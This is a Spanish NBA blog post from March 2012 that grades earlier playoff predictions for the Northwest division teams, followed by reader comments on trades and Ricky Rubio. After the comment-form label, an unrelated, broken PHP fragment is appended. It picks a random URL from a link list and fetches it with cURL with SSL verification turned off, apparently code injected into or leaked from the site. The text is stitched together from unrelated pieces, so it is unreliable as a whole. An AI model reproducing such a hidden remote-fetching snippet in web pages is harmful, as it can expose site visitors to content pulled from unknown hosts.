Revisando los pronósticos 2012: Northwest

06 de March de 2012 por TheDeerHunter

 OKLAHOMA CITY THUNDER

Pronóstico Enero 2012: Finalistas de conferencia (análisis)
Probabilidad de acierto: Medio
Calificación pronóstico: B+

Todo apunta a que nos quedamos cortos en nuestro pronóstico. Todo marcha viento en popa en OKC y ahora mismo parece poco probable que alguien en el Oeste sea capaz de negarles la final que buscan. 80% de victorias se dice pronto, pero cuentos de la lechera también ha habido muchos.

“Rebound and run” imparable que señalábamos. Entre los mejores de la liga bajo tableros y acribillando aros. Tienen su particular Big Three en Durant, Westbrook y Harden aunque en ocasiones no casen entre ellos como muchos soñarían (como en otros ejemplos significativos, por otro lado). Siempre lo pueden aderezar con ese intenso pegamento que es Ibaka o con las labores de intendencia de Sefolosha, Perkins o Collison.

Para terminar de reventar nuestro pronóstico deberían apretar en defensa, la más floja de entre los candidatos. En los playoffs se exige otra cosa. Lo del “rebound” seguirá vigente pero no les dejaran correr tanto como les gustaría. El libreto de Brooks va a estar más exigido que nunca.

DENVER NUGGETS

Pronóstico Enero 2012: Segunda ronda (análisis)
Probabilidad de acierto: Medio-bajo
Calificación pronóstico: C+

Las bajas prolongadas de Gallinari, Nene, Mozgov y Rudy; la fuga de Chandler, JR Smith y Marti Sólo con la profundidad de plantilla que hay en Denver se puede resistir en plaza de postemporada entre tantas incidencias. En ese aspecto indudablemente acertamos en nuestro análisis.

La apuesta de George Karl es a pecho descubierto. Matar o morir, sin medias tintas. Pocos anotan más y pocos encajan menos. En condiciones normales se intuye que se inclinaría más a lo primero que a lo segundo, pero de momento es lo que hay. Con salud en postemporada serán un rival terrible, pero hasta entonces el panorama se podría complicar mucho si  sus mejores piezas no recuperan el nivel mostrado antes de las lesiones.

Da gusto ver esa segunda oleada con Andre Miller o Al Harrington en su segunda juventud, con Corey Brewer recuperado como jugador, con el rookie salvaje Kenneth Faried… Es complicado no conectar con ese estilo de juego y casi todos lo agradecen con un alto rendimiento colectivo. De los 15 jugadores que han sido utilizados este año no hay uno sólo que no registre dobles dígitos en el PER de Hollinger. No es frecuente.

Si acaso uno todavía espera mayor contribución por parte de algunas apuestas personales. Nene, Afflalo, Mozgov y Rudy están resultando puntuales decepciones.

PORTLAND TRAILBLAZERS

Pronóstico Enero 2012: 4º-5º del Oeste. 2ª ronda de Playoffs (análisis)
Probabilidad de acierto: Difícil.
Calificación pronóstico: D

Podemos calificar de tragedia la esperada retirada de Roy antes de empezar el curso, así como la enésima (¿quizás definitiva?) lesión de Oden inmediatamente después de haber firmado su qualifying offer (aunque también antes de empezar el curso). Sin duda tiene una alta cota de mala suerte lo que se ha vivido en Portland desde que Pritchard y McMillan empezaron a repartirse cariños desde hace más de un lustro.

Muchos dicen que la suerte hay que buscarla. La guapa del baile nunca se larga con aquel que nunca se atrevería a tirarle los tejos (seguro que el ídolo Serge Gainsbourg buscaba siempre su propia suerte), el sol nunca brilla para los que tienen cara de seta permanente y aquel que siempre ve la botella medio vacía jamás conocerá la sensación de ganar una buena mano de poker. El caso es que en Portland, no sabría decir porqué, tienen naturalmente interiorizada su negativa situación y no se observa una clara voluntad de intentar cambiarla.

Las lesiones de Roy y Oden se conocían antes de publicar nuestro análisis, y en ese momento una inmensa mayoría de seguidores y analistas, atendiendo a la plantilla confeccionada sin ellos, les daba como seguros en playoffs incluso con factor campo a favor. Quizá no tanto para una segunda ronda, que teniendo en cuenta los antecedentes, parece demasiado pedir a esta franquicia. Sobra decir que no están cumpliendo expectativas, ni individual ni colectivamente, tampoco en juego (¿o quizás sí?) ni en resultados. Esto debería de ser imperdonable para cualquier resultadista.

Pero cuidado, porque igual estamos asistiendo a una mutación maravillosa. El gusano se está abriendo para convertirse en mariposa. ¿Quién nos iba a decir que los Blazers serían uno de los equipos más anotadores a estas alturas? McMillan se ha convertido en Menoti y no nos habíamos dado cuenta. ¿Estará intentando “quemar su suerte” en plan Serge Gainsbourg? Al menos podría empezar a buscar excusas más en el exceso que en el defecto, o quizás comience a ligar con mujeres de bandera. Permitidme escepticismo tanto de uno como de lo otro.

MINNESOTA TIMBERWOLVES

Pronóstico Enero 2012: Podrían pelear uno de los últimos puestos de Playoffs/ Fuera pero con mejora en porcentaje de victoriaS (análisis)
Probabilidad de acierto: Total
Calificación pronóstico: A

Había que tener ojo o ser bastante temerario para soltar eso de “pelear por uno de los últimos puestos…” Teniendo en cuenta la atención en España y los peores augurios con Ricky Rubio fue un gran acierto apostar por él como base titular. No creo que fuera una casualidad.

En este contexto tanto da una primera ronda o quedarse fuera. Los Wolves nos han ofrecido algunas de los mejores momentos de este curso y varias sorpresas positivas. Si el objetivo era “mejorar el número de victorias y volver a llenar el Target Center” no cabe duda de que lo han conseguido con creces. Quitémonos el sombrero una vez más ante el viejo zorro Adelman y ante el increíble Kevin Love, un jugador de otros tiempos que parece todavía algo infravalorado.

Lo mejor es que gran parte del curso lo han pasado sin Beasley ni Barea y esto podría dar ideas interesantes de cómo reforzarse (como se rumorea ya están haciendo). Este grupo de jóvenes cachorros, como decía el análisis, empiezan a llamar a la puerta del envejecido oeste.

UTAH JAZZ

Pronóstico Enero 2012: Pueden rondar el 50% y la 8ª plaza de postemporada, pero lo normal sería que no la alcancen (análisis)
Probabilidad de acierto: Media-Alta
Calificación pronóstico: A

Lo avisábamos y el tiempo parece darnos la razón. Empezaron fuertes los Jazz apuntando ese tradicional buen rendimiento. Precisamente su mejor momento tenía lugar cuando publicábamos el análisis, pero ya andábamos con la mosca tras la oreja con unos objetivos no demasiado acordes a la experiencia y calidad de la plantilla. Nos parece fantástico que lo “normal” en Utah haya sido firmar playoffs un año tras otro, pero no nos parece normal que sea eso lo que se les exija bajo cualquier circunstancia, cuando no es algo que firme ninguna de las franquicias estructuralmente más potentes de la liga.

Ese nivel de exigencia es simultáneamente una causa y un fin que se retroalimentan. Tradicionalmente se han hecho las cosas bien allí y aún tras el tsunami quedaba un equipo sólido, que únicamente flaquea ante la división de la muerte. No se puede ignorar que el grueso de la plantilla apenas alcanza los dos años en la liga y que jugadores como Miles, Millsap o Devin Harris son casi veteranos dentro de ella. No es lo mismo defender con un grupo así que con la guardia pretoriana de Jerry Sloan.

Comenta

27 comentarios a esta entrada

  1. Esteban dice:
    #1

    me gusta mucho el roster que han armado los wolves, sobretodo el nucleo joven ricky-williams-love-pekovic

    pero como lo dije antes y lo sostengo, tienen muchos buenos jugadores con contratos asumibles por otras franquicias, caso ridnur, barea, miller (por su expiring), beasley, wes jhonson e incluso milicic y randholph

    si unieran algunos de estos jugadores, haciendo una buena oferta, podrian fichar un acompañante de love de mayor jerarquia, se me ocurren monta ellis y kevin martin como principales tiradores, quiza el propio granger o hasta joe jhonson,

      Citar

  2. Sancho88 dice:
    #2

    Yo a Esteban la daría plenos poderes en la configuración de la plantilla de los Wolves, y en la configuración de la plantilla de los Clippers, de cara a la próxima temporada. Siempre concienzudo analizando posibilidades para mejorar esos equipos, jeje. Yo el contrapunto con los Wolves lo veo en que es una ciudad bastante fría y poco apetecible para los grandes jugadores, y, sobre todo, si van a ser capaces de mantener a Kevin Love en un futuro… pero creo que es un equipo que levanta simpatías por la época de Kevin Garnett, y que en España, y supongo que también en Argentina, cae bien porque juega Ricky Rubio, Love, entrena Adelman, etc. Lo de Pekovic es el mayor subidón de adrenalina conseguido por un rookie, aparte de Greg Monroe, con respecto a la temporada pasada. Si acaso, creo que les falta algo de identidad, con una rotación fiable, y una batería de aleros seria. Pero por lo demás, si con esto están consiguiendo más del 50% de victorias, no me quiero ni imaginar qué podría pasar con un Monta Ellis de la vida, o un Granger. Yo lo de Ellis lo veo clarísimo. GSW tiene una mierda de pívots, y a Minnesota le sobran. Tolliver, Randolph, Milicic… no sé, podrían ser aprovechables en algún lugar. Con Ricky, Williams, Love, Pekovic, más un hipotético Ellis, un traspaso de Beasley buscando a algún alero de perfil defensivo, y hacerse con Jason Thompson o JJ Hickson, que este verano quedan libres… no sé, yo les veo a los Wolves haciendo playoffs en el Oeste año sí, año también. Me encantaría que estos chavales juntos aspirasen a un título

      Citar

  3. Sancho88 dice:
    #3

    Si Love se queda, Ricky-Love puede ser un buen reclamo para llamar a una tercera espada, como bien comentas.

    El resto de análisis también están bien, aunque nadie nos esperábamos el batacazo de los Blazers…

      Citar

  4. MagicJohnson32 dice:
    #4

    El problema con Monta Ellis, citando a no sé quién (no recuerdo dónde lo leí), es que todos los equipos de la liga saben que Monta no es una súper estrella… excepto los Warriors. Por lo visto es muy difícil que salga porque los GSW se pasan tres pueblos cada vez que entra en una negociación.

      Citar

  5. Esteban dice:
    #5

    MagicJohnson32:
    El problema con Monta Ellis, citando a no sé quién (no recuerdo dónde lo leí), es que todos los equipos de la liga saben que Monta no es una súper estrella… excepto los Warriors. Por lo visto es muy difícil que salga porque los GSW se pasan tres pueblos cada vez que entra en una negociación.

    eso es muy cierto, pero hasta los warriors se terminaran dando cuenta que es el tercer año con curry-ellis y ademas ahora con lee, y no terminan nisiquiera en un 50%, asi que dudo que sigan por este camino, hasta han cambiado entrenador, en algun momento deberan desprenderse de ellis salvo que quiera seguir en el limbo (selecciones de draft no taaan buenas, y lejos de PO)

    entiendo que los wolves no son un equiipo que atraihga agentes libres, por eso he planteado hacer un traspaso, donde el jugador no pueda negarse a ir, caso jo jo, habria que hacerse cargo de su contratazo, pero todos los aspirantes a algo serio asumen contratazos, incluso hasta el thunder (perkins)

    q les parece la oferta de los clippers por allen? bledsone, mas Mo o foye, mas una seleccion, PUES DIGANME LOCO, pero para mi es un negocion para boston, este año los celtics no pueden competir con este equipo y no pueden mejorarlo por los salarios, sus chances de campeonar son minimas, incluso de pasar primera ronda, se harian con un joven base como bledsone, un expiring como foye y una ronda a cambio de perder a allen por un par de meses, y pueden repescarlo como agente libre antes del prox curso

      Citar

  6. nba dice:
    #6

    Los Wolves tienen que conseguir encasquetar a W.Johnson-Milicic-Webster y si acaso Beasley por las piezas que necesitan , el resto ni tocarlos teniendo en cuenta lo poco que cobran(Tolliver-Randolph)
    Y el gran acierto de Wolves es haberse hecho con los servicios de Adelman., de hecho me parece que los Clippers han encontrado a su bestia negra , juajuajua

      Citar

  7. MagicJohnson32 dice:
    #7

    Los Wolves van a por Jamaal Crawford. No les iría nada mal.

      Citar

  8. Lucho dice:
    #8

    Gente, para los que entienden bastante de contratos y demas.
    JR, Chandler y Martin, segun tengo entendido, pudieron elegir ellos mismos el irse a NY o los Clippers en vez de regresar a Denver.
    Eso es xq ellos vienen de jugar en China (de donde recien pudieron volver en feb-marzo, y no al fin del lockout) o es, por el contrario, por los contratos que ellos mismos tenian firmados con los Nuggets (y hubiese sido igual si en vez de China se iban a Turquia, como Deron x ejemplo)???

      Citar

  9. rumbero dice:
    #9

    Lucho: Gente, para los que entienden bastante de contratos y demas.JR, Chandler y Martin, segun tengo entendido, pudieron elegir ellos mismos el irse a NY o los Clippers en vez de regresar a Denver.Eso es xq ellos vienen de jugar en China (de donde recien pudieron volver en feb-marzo, y no al fin del lockout) o es, por el contrario, por los contratos que ellos mismos tenian firmados con los Nuggets (y hubiese sido igual si en vez de China se iban a Turquia, como Deron x ejemplo)???

    Es porque en su momento era agentes libres, por lo que podían firmar por cualquier equipo. Da igual que vinieran de China, Turquia o se hubieran quedado en EEUU.
    Otro caso es el de Wilson Chandler que también se fue para allá, pero él es agente libre restringido porlo que los Nuggets pueden igualar una oferta que les llegue por él de otra franquicia (por cierto sonaba un interés de Toronto…nse como está el tema, pero seguro le vendría muy bien)

      Citar

  10. melo15 dice:
    #10

    Pues yo creo que los bucks tendrian que intentar fichar a chandler, Boute no da para alero titular

      Citar

  11. Lucho dice:
    #11

    Buenisimo Rumbero, se agradece. No sabia que eran agentes libres, pense q se habian ido con contrato. Ahora si me quedo claro. Muchas gracias

      Citar

  12. Sempren dice:
    #12

    Justo Afflalo viene de hacer un par de partidazos… aunque entiendo las malas sensaciones, la verdad es que no les salió barato, aunque es un jugador muy completo.

      Citar

  13. melo15 dice:
    #13

    Ricky esta fatal, lleva un 35 por ciento en tiros, si o de Jennings estaba mal, imaginate, al menos Jennings metia 20 puntos y era la primera opcion ofensiva de su equipo, desastroso Ricky

      Citar

  14. MagicJohnson32 dice:
    #14

    Interesante: los Wolves han enviado un vídeo a la NBA para denunciar que Ricky está recibiendo últimamente un juego muy físico y duro por parte de los rivales. El otro día a Pryzbilla se le fue la olla con él, pero no sé si ha habido más casos de juego sucio. Posiblemente los Wolves estén exagerando aunque es buena señal que intenten protegerlo cuando peor está.

      Citar

  15. infante dice:
    #15

    MagicJohnson32:
    Interesante: los Wolves han enviado un vídeo a la NBA para denunciar que Ricky está recibiendo últimamente un juego muy físico y duro por parte de los rivales. El otro día a Pryzbilla se le fue la olla con él, pero no sé si ha habido más casos de juego sucio. Posiblemente los Wolves estén exagerando aunque es buena señal que intenten protegerlo cuando peor está.

    asi a bote pronto y sin saber nada del tema, me parece un poco rastrero e indigno, no creo que ninguna estrella haya denunciado publicamente el juego sucio que se ejerce sobre, y mira que hay precedentes, si no quieren que le den, que se dediquen al badminton o al ajedrez XD

      Citar

  16. MagicJohnson32 dice:
    #16

    Aquí tenéis el enlace con la noticia: http://www.startribune.com/blogs/53702862.html

    Y aquí, “Ricky AKA El Niño From El Masnou” xDD http://www.youtube.com/watch?v=RsdU6QWEsOc

      Citar

  17. Sancho88 dice:
    #17

    Me parece un ejercicio de corporativismo lamentable. La cabeza pensante que haya redactado esto, y, sobre todo, el que haya autorizado enviárselo a la NBA se había metido unos lingotazos previamente. Es una vergüenza indigna que pidan más protección para un jugador ya de por sí protegido por la liga. La NBA ha mimado más a Ricky que Jordi Villacampa, Xavi Pascual… es decir, de los que se supone que eran sus “amigos” en España. Con ellos pasó sus peores momentos. Ahí sí merecía protección, porque ambos le jodieron por todas partes. Recuerdo Villacampa absolutamente rastrero pidiendo ir a juicios con Ricky por exigir la salida hacia el barsa, cuando el chaval únicamente cobró 75.000 euros desde los 14 hasta los 17 años, y tenía una cláusula de rescisión de 3,5 millones de euros… bueno, creo que todos recordáis aquello. Y luego Pascual casi cargándose su carrera deportiva creándole complejos, castigando sus errores, etc. No creo que Ricky haya pedido esto al club, porque él las ha pasado mucho peores y este año para él es una liberación. Los jugadores en la NBA se tienen que ganar el respeto por experiencia y galones, como ha pasado toda la vida. Repito, la actitud corporativa de los Minnesota Timberwolves me parece de tercero de primaria, una mierda… Si querían ayudar a Ricky, creo más bien que han hecho todo lo contrario, perjudicar al chaval con esto. Vergonzoso

      Citar

  18. Sancho88 dice:
    #18

    Decidme un jugador más protegido y mimado por la NBA que el propio Ricky Rubio… es que no entiendo para nada esta ida de olla…

      Citar

  19. MagicJohnson32 dice:
    #19

    Sancho88:
    Decidme un jugador más protegido y mimado por la NBA que el propio Ricky Rubio… es que no entiendo para nada esta ida de olla…

    Lin.

      Citar

  20. Esteban dice:
    #20

    se me ocurrio flipando por ahi:

    melo por monta ellis y algo mas, pueden ser rondas (una primera y una segunda) u otro jugador, wright quiza

    no se, creo que melo no solo no hace mejor a sus compañeros, sino que tamb los hace peor, sobretodo en un equipo con recursos como los lakers, abosrbe demasiado juego, y tiene demasiado ego para cambiar eso, en los warriors podria ser el melo que quiere ser y con curry formar una buena dupla

    los knicks se ahorrarian varios millones (11 en total), y a la vez creo que los mejoraria, melo y amre juegan muy pero muy parecido, mmientras que el tiro de ellis es complementario con el juego interior de los knicks, ademas de tener cierto espacio para el prox año

    lastima q el marketing de melo es demasiado preciado en NY como para ver lo mal que le hace a su equipo

      Citar

  21. Sancho88 dice:
    #21

    MagicJohnson32: Lin.

    ok, aceptamos a Lin como animal de compañía, xd

      Citar

  22. Esteban dice:
    #22

    alguien esta viendo los knicks?

    dios q patetico lo de carmelo, pocas veces eh visto a un tio de 2.03 ser tapado con tanta facilidad, le falta agilidad y fuerza para forzar bandejas e igualmente va y lo hace, el resultado, tapon, realmente indignante como un tio puede hundir a un equipo de esa manera

      Citar

  23. HisRoyalAirness dice:
    #23

    Sancho88:
    Decidme un jugador más protegido y mimado por la NBA que el propio Ricky Rubio… es que no entiendo para nada esta ida de olla…

    Lebron, Kobe…

    Creo que a lo que se refieren no es a la dureza con la que se emplean con él, sino al criterio para darle faltas. Muchos de los tiros que hace son en penetración buscando la falta y falla y no se la pitan (y os aseguro q sí es). Ese tipo de faltas si eres Rose, Westbrook, Lebro etc las tienes siempre y eso hace que el potencial ofensivo de Ricky se vea muy disminuído. La NBA deberìa mirarse los raseros porque, de paso con este escrito, reivindican la labor arbitral ante los wolves, el equipo más ninguneado. A Love le pitan el 50 por ciento de las faltas q recibe bajo el aro y a Beasley y Barea igual.
    Y sí que hay precedentes de este tipo de escrito, millones

      Citar

  24. HisRoyalAirness dice:
    #24

    Añado también a Durant como jugador mimado

      Citar

  25. Txusma dice:
    #25

    Bueno, creo q de toda la vida los rookies han recibido un trato “discriminatorio” en ese sentido. Les pitan la mitad de las faltas que reciben.

      Citar

  26. nba dice:
    #26

    Me parece que si hasta ahora teniamos un Gasoft , ahora vamos a tener tambien un Rickysoft …

      Citar

  27. Jose Luis dice:
    #27

    @Sancho88

    Kevin Durant, más protegido que ése (aparte de Lin este año) no he visto a nadie

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>